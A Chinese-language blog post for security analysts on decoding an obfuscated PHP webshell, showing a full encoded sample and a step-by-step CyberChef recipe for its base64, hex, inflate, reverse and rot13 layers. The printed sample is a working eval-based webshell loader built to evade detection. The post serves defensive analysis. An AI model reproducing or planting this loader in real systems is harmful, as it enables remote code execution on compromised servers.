在网络安全运营,护网HVV,重保等活动的过程中,webshell是一个无法绕过的话题。通常出现的webshell都不是以明文的形式出现,而是针对webshell关键的内容进行混淆,编码来绕过网络安全产品(IDS,WAF,沙箱,邮件网关,EDR等)产品的检测。本文介绍其中一种曾经出现过的比较复杂的绕过方式,作为《各种数据绕过实战分析篇》中的一篇,这里。通过解析该绕过方式,希望能够对于日常解读webshell pcap数据包,webshell文件提供参考思路。
Webshell介绍
Webshell是一种恶意软件,它通常是由攻击者利用Web应用程序的漏洞或不安全配置,在受攻击的服务器上植入的一段恶意代码。这段恶意代码可以以各种形式存在,例如一段PHP、ASP、JSP等脚本代码,或者是一段可执行的命令或脚本。
Webshell 载体
- webshell常见的载体是php,asp,jsp等文件格式。
- webshell的载体还可以是图片,文档,压缩文件文件,即将对应的代码嵌入到图片之中,俗称图片码。
- webshell的载体可以是网络数据包,即通过RCE远程利用漏洞的形式将恶意代码注入到程序中。更多的关于webshell的远程利用分析,可以参考《安全运营之网络攻击研判分析》,这里。
对于经过编码和混淆之后的webshell,无论载体是什么,都需要提取对应的webshell内容还原对手原本的目的。
Webshell 样本
如下为一段采用多种编码,反转等手段的webshell样本,详见这里,如下:
<?php
$func="cr"."ea"."te_"."fun"."ction"; $x=$func("\$c","e"."v"."al"."('?
>'.base"."64"."_dec"."ode(\$c));");
$x("PD9waHAgJHsiR1x4NGNceDRmQlx4NDFceDRjUyJ9WyJceDZhXHg2Nlx4NjRceDYxXHg2OGl2anEiXT0iXHg0MVx4NmUwXHg2ZVx4NWYzXHg3OFx4NTBceDZjb1x4NjlceDU0ZVIiOyRyeWh0bmVsaW5sPSJceDU1XHg2NVx4NThwbFx4NmZceDY5VCI7JHsiXHg0N1x4NGNceDRmXHg0Mlx4NDFMXHg1MyJ9WyJ3XHg2N1x4NjN3XHg3YXhceDc1XHg2YVx4N2EiXT0iVWVceDU4cFx4NmNceDZmXHg2OVQiOyR7JHsiXHg0N1x4NGNceDRmXHg0MkFMXHg1MyJ9WyJceDc3Z2NceDc3XHg3YXhceDc1alx4N2EiXX09Ilx4NTNceDc5XHgzMVx4NGNceDdhXHg0ZUZceDUxS1x4NzlceDdhTlx4NGM3XHg0N1x4MzJWMFx4NzNceDc2XHg3M1x4NTlceDU5XHg3N1x4MzlceDU5cFx4NGNceDY5dUtMOGtceDczXHg0ZFx4NmFUXHg1OFx4NTNceDcxXHg3YUx6MG5JXHg1M1MxS1x4NDJyXHg0ZVx4NGJceDM4XHgzNVB6XHg2M1x4NjdxXHg0Y1x4NTVceDM0bVx4NGNxXHg0M1x4NDNceDYzXHg2Y1x4NDZxZVx4NjFceDZkXHg2M1x4NTNuXHg3MFx4NDNceDYyblx4NzBceDM2UnFceDQxXHg0Zlx4MzBzXHg1M1x4NjkzXHg1NFVISFx4NGRNOFx4NjlceDRjXHg0ZVx4MzY0SXlNXHg2ZVx4NTBEXHg0NWtOXHgzMGtceDUxXHg0MzFceDY3XHg0MVx4M2QiOyR7JHsiR1x4NGNPXHg0Mlx4NDFceDRjXHg1MyJ9WyJqXHg2Nlx4NjRhXHg2OFx4Njl2alx4NzEiXX09Ilx4M2RceDNkd1x4NzVceDRmXHg2Y1x4NzVceDUzXHg0Ylx4NjlVXHg0Nlx4MzRceDUxXHg1OFx4NTFceDQxL1x4NDlxNlx4NGRZXHg1NkY4L3lceDZkXHg0OEdceDJiUnZ0XHgzMFx4NTRceDYzNW42XHg2Mk5ceDYxXHg2Zlx4NTdceDYzNVVceDMzXHg2Zm5ceDY0XHg0M1x4NTZceDc4XHg2Y1x4NjZ4Ulx4NTBceDc0XHgzOFx4NTA4XHg0ZC9ceDZkXHg1MFx4NzVceDM2OFx4NzJPXHg3M1x4NzhceDczOVx4NzRceDRiXHg2OVx4NDQ5XHg1M1x4MzlZXHg2Y1RceDYxXHg0Zlx4NDdceDc2aVx4NjhceDVhRFx4MmJMTVx4MzJceDQ0XHg2OFx4NzdceDRiXHg2ZVx4NjFnXHgzMGZceDRlNVx4NjNceDRmXHg0MVx4MzRceDUwXHg1Nlx4NjIvXHg1Nlx4MzQwXHgzNzJceDQ4L1x4NTlceDc5XHg2ZXFceDYyci9ceDY2N2lceDY3XHg2MVx4NjlceDRmXHg3Nlx4NTlPclx4NjhceDY5XHg0ZVNTXHg0Y1x4NTFvXHg2OFx4NTBceDJiL1x4MzJceDJidlFceDQza1x4N2EyXHgzNGV0XHg2MW5ceDQ1XHg2ZVx4NzZceDMzXHgzM0Q1UWlceDYyXHg1M3Y0MFx4MmJceDY2XHg0Y1x4MzNyXHg1N1x4NjNceDM3XHgzNVx4NzBlXHgzNFx4NzVceDMzXHg0Ylx4NjlceDZhWlx4NTBTZFdceDc5OWx3NFx4NDJceDMxTi9ceDQxXHg3NjdceDQxVXRceDQydlx4NDRceDUyXHg3MUxceDc5ZVx4MmJOXHg1YVx4NTQvazJceDcyRVx4NjFceDcyXHg1N25ceDM3SFx4NTlaXHgzMVx4NWFceDU2XHg2NVx4NjlceDc3XHg2Y1x4NmFceDc4XHgzMlx4NjlceDc3XHg2YXptXHg2Mlx4N2FceDVhXHg2MVx4MmJceDM4NVx4NmNETVx4NzVyXHg0N1NceDQ0NERceDY2XHg1OFdceDY3alx4MzFceDc1alx4NDJceDYxXHg1NVx4NjhceDQ1XHg1M1x4NjFceDM3dVx4NTVceDZjXHg0MlVSSks0XHgzMFlceDQyaVx4NjFceDMzSlNceDY0dGtSXHg2M1x4NjgxMnVMXHg3OFx4NDI0Wk10XHg0YXZceDY5XHg0NWZXXHg0Mlx4NDJJMVx4NzlceDQ0XHg1NlVXL1x4NTNceDQ0aFx4NDNlVFx4N2FceDcxXHg0Mlx4NDRceDY2XHgzOHJceDY2XHg0ZTY3XHg0MVx4MzNceDc5ZDBOXHg1N1dxXHg0M2dceDM0XHg0N1x4MzRceDUzXHg0Mlx4NjNceDYyRW9ceDcwUFx4NzNceDcxXHgzMXQvXHg3MTBceDYyUFx4NjlceDQ2R1x4NmZceDY3XHg0Ylx4NDc0XHg0MVx4NGRceDRhXHg0MnpSXHg0ZFx4NmRceDMzM1x4NDdKXHgzNVx4NjVceDZiS1x4NTRceDc4XHg3MVx4NDlZXHg2N0dceDMxSlx4NTVJXHg3MFx4NTQ4ZFx4NThpOTNceDRjLzNceDRmNlx4NzFuNVFceDZmXHg2ZFx4NTVKXHgzMHVSeE1GXHg0MnN0bVNceDc1OFx4NDkvXHg1OUlceDcyNVNRXHgzM1x4MzhoXHg0Mlx4NjM3XHg1OFx4MzJceDY5NElceDVhXHgzMlx4NTRceDY2XHg0Mlx4N2FceDJiNlx4Njl2RFx4NDRceDM2bXJVeVx4NDV1XHg3OXF5XHgzMFx4NWF2XHg0Mlx4NGVceDQ2XHg1OVx4MzdvXHg0MXhvXHg0M1x4NGJceDRjXHg0M1x4MzRceDRiXHg0YXcyXHg2N1x4NjVNXHgzOFx4NzhceDYxXHg2OFx4MzhceDZkXHg0NWRGZjZceDc4N1x4NDRceDYyXHgzNjRceDRiXHg2Ylx4NDFOXHg1N1x4NThLZWZceDQ2XHg2Zlx4NGJYc2xceDQzXHg3M1x4N2FceDQyVllceDc1Rlx4NzQvVFx4NzZceDM4XHgyYlx4NThceDM5SVBwUTRceDczXHg2N2lceDQycVx4NzVceDc1VFx4NGFnWlx4NTNceDMyZVx4NzlIXHg1MHRceDcwXHg3NVx4NzNceDcwXHg0NFx4NTNceDdhVkxkXHg2NFx4NGFceDUyXHgyYlx4NjNceDM1SjNceDY2XHg2ZHpRXHgzMFx4NjNxU1x4NzhceDcyaFx4MmJceDYxXHg3MWtnU1x4MmJ2XHg0YVx4NGJnXHg2Nlx4NGFZXHg0ZVx4N2FceDY1XHg2OVx4NDZ4XHg3OE9ceDc1XHg2Nlx4NThtV1x4NjdWXHg3MFx4NDFceDY3cS9ceDU1XHgzMFx4N2FceDQ0XHg3NFx4NDJMM1x4MzRceDMxUDFceDY3XHg0Mlx4NjhceDU5LzJceDU4XHg1OFx4MzJvXHg3Mlx4NWFceDU2UTFceDYxXHg2OUwzXHg2NVx4NzVceDU5XHg2ZVx4NTNceDM1XHgzME1ceDU5ZFx4NzJKWlx4NTJoUzRceDQyR2pceDQyOVx4NzZkTWxceDQ1S1x4NmVzXHg3NFx4NGFKXHg0YVpQblx4NjlkUVx4NWF5XHg2MWRceDczXHg1Mlx4NzJceDYyXHgzN1x4NzFceDM5XHg3M1x4NmVceDRiVkVceDc5XHg2M2VceDY4XHg3MVx4NDFceDQyXHgzM21tS1RceDJiNVx4NDJceDJiOFg0XHg3NTNmM1NceDM4V3ppXHg0M1x4NzREWmZ2Zlx4NmVceDcxSVdTVFx4NjVtXHg0ZVx4NGZWc0hceDU2XHg0MmtIXHg0Ylx4NTZceDc0XHg1Mlx4NmVceDRjZU5JXHg3NDFceDRheFx4NzFceDUwRlx4NTMzXHg0M1N4XHg0MVx4NmJceDMxXHg0M1x4MzM3XHg0YVx4MmJ3XHg1OEhEXHg0Mk1ceDYxL1dceDYyVDJceDU3L1x4NjNceDRid1x4NTlceDQyd1x4NGFlOUhceDcwXHg0MVx4NzVGUS9NXHg0Ylx4NzdceDYzXHg0Mlx4NzdceDRhZVx4MzlIb1x4NDFceDJiRlx4NTEvOEpceDc3XHg2N1x4NDJ3XHg0YWU5SG5ceDQxT0dceDUxL1x4NzNceDRhXHg3N1x4NmJceDQyd1x4NGFlIjtldmFsKGh0bWxzcGVjaWFsY2hhcnNfZGVjb2RlKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCR7JHJ5aHRuZWxpbmx9KSkpKTtleGl0Owo/Pg==");
exit;
?>
可以看到该样本的内容经过了编码,因此无法直接获取内容的意图。
识别编码
常见的编码包括base64,URL,hex,char,gzip,xor,utf-8等,详见《各种编码理论篇》,这里。因此第一步需要对于常见的编码字符集有一定的了解,在遇到对应的数据之后能够猜测数据使用的编码手段。当然webshell中本身用来解码的函数也会暗示我们采用的编码手段。
上述webshell样本第一眼能够看出是base64编码,随着解码的深入,会发现越来越复杂。
程序解码
如果使用python等程序的方式解析上述的数据步骤如下:
- 提取需要解码的数据内容
- 编写Pythonbase64解码数据
- 使用IDE显示代码内容
编写程序的灵活度高,但是耗时耗力,并不是日常网络安全运营,HVV,重保过程中重点投入的地方。编写程序只是手段之一,其根本目的在于溯源整个攻击链条。
cyberchef解码
base64解码
- 提取需要解析的内容,由于输入的是整个webshell内容,因此需要使用正则提取对应的编码内容。正则的内容就是base64字符集的正则,为了略过php,eval,gzinflate等字符,需要匹配长度至少为30的字符串。
- 提取的内容为base64编码后的数据,因此需要进行base64解码,如下图1:
图1
Hex解码
如上图1,base64解码之后的数据存在16进制编码的数据,因此需要将16进制转换为对应的字符,如下图2:
图2
由于From Hex模块的输入是一个数组,二而图中的结果为一串字符串,输入并不是数组。因此先试用使用subsection模块匹配形如\x4c模式的字符,形成数组。然后在使用From Hex将对应的十六进制转换为对应的ASCII字符。
替换分隔符
上图2中遗留的\x影响阅读习惯,因此需要将\x分隔符去除,如下图3:
图3
上图的subsection本质上是将形如\x4c模式的字符通过From Hex一个个转换,转换之后是以数组形式存在的,因此转换之后的字符需要进行合并,然后整体替换对应的字符。
多种编码逆运算一
上图3从最后的函数可以变量wgcwzxujz采用了base64编码+压缩+HTML编码,因此需要进行相应的逆运算,如下图4:
图4
注意上图3可知wgcwzxujz和jfdahivjq都是base64字符集内的字符,但是jfdahivjq明显以==开头,和正常的base64不同,因此在对于wgcwzxujz进行逆运算的过程中,subsection部分的正则匹配在结尾加了=字符,用来匹配wgcwzxujz变量。
多种编码逆运算二
上图4中可知jfdahivjq 变量的内容就是An0n_3xPloiTeR,而An0n_3xPloiTeR的内容,经过了反转(strrev),编码(base64_decode),压缩(gzuncompress),xor等多种操作,因此需要对jfdahivjq 变量做相应的逆运算,如下图5,6:
图5
图6
图5中对于jfdahivjq 变量的内容,首先匹配提取,然后反转操作,base64解码,由于gzuncompress以及gzinflate的操作进行了三次,因此图6中使用了label和jump的组合,最后rot13解码,关于rot13编码,见这里。
代码美化
上图中最终的结果并不利于代码查看,因此需要针对代码进行美化,如下:
图7
至此可以看到对手webshell原本的意图,该方法有助于日常网络安全运营,护网HVV,重保等活动的过程中的安全事件调查。
cyberchef recipe
使用的recipe内容如下,可以在cybechef中直接导入即可,如下:
[
{ "op": "Regular expression",
"args": ["User defined", "[a-zA-Z0-9+/=]{30,}", true, true, false, false, false, false, "List matches"] },
{ "op": "From Base64",
"args": ["A-Za-z0-9+/=", true, false] },
{ "op": "Subsection",
"args": ["(?<=\\\\x)([a-fA-F0-9]{2})", true, true, false] },
{ "op": "From Hex",
"args": ["\\x"] },
{ "op": "Merge",
"args": [true] },
{ "op": "Find / Replace",
"args": [{ "option": "Regex", "string": "\\\\x" }, "", true, false, true, false] },
{ "op": "Subsection",
"args": ["[a-zA-Z0-9+/=]{30,}=", true, true, false] },
{ "op": "From Base64",
"args": ["A-Za-z0-9+/=", true, false] },
{ "op": "Raw Inflate",
"args": [0, 0, "Adaptive", false, false] },
{ "op": "From HTML Entity",
"args": [] },
{ "op": "Merge",
"args": [true] },
{ "op": "Subsection",
"args": ["[a-zA-Z0-9+/=]{30,}", true, true, false] },
{ "op": "Reverse",
"args": ["Character"] },
{ "op": "From Base64",
"args": ["A-Za-z0-9+/=", true, false] },
{ "op": "Label",
"args": ["decompress"] },
{ "op": "Zlib Inflate",
"args": [0, 0, "Adaptive", false, false] },
{ "op": "Raw Inflate",
"args": [0, 0, "Adaptive", false, false] },
{ "op": "Jump",
"args": ["decompress", 3] },
{ "op": "ROT13",
"args": [true, true, false, 13] },
{ "op": "Generic Code Beautify",
"args": [] }
]
以上就是针对webshell绕过内容解析的介绍,希望对你日常工作有所帮助。
本文为CSDN村中少年原创文章,未经允许不得转载,博主链接这里。
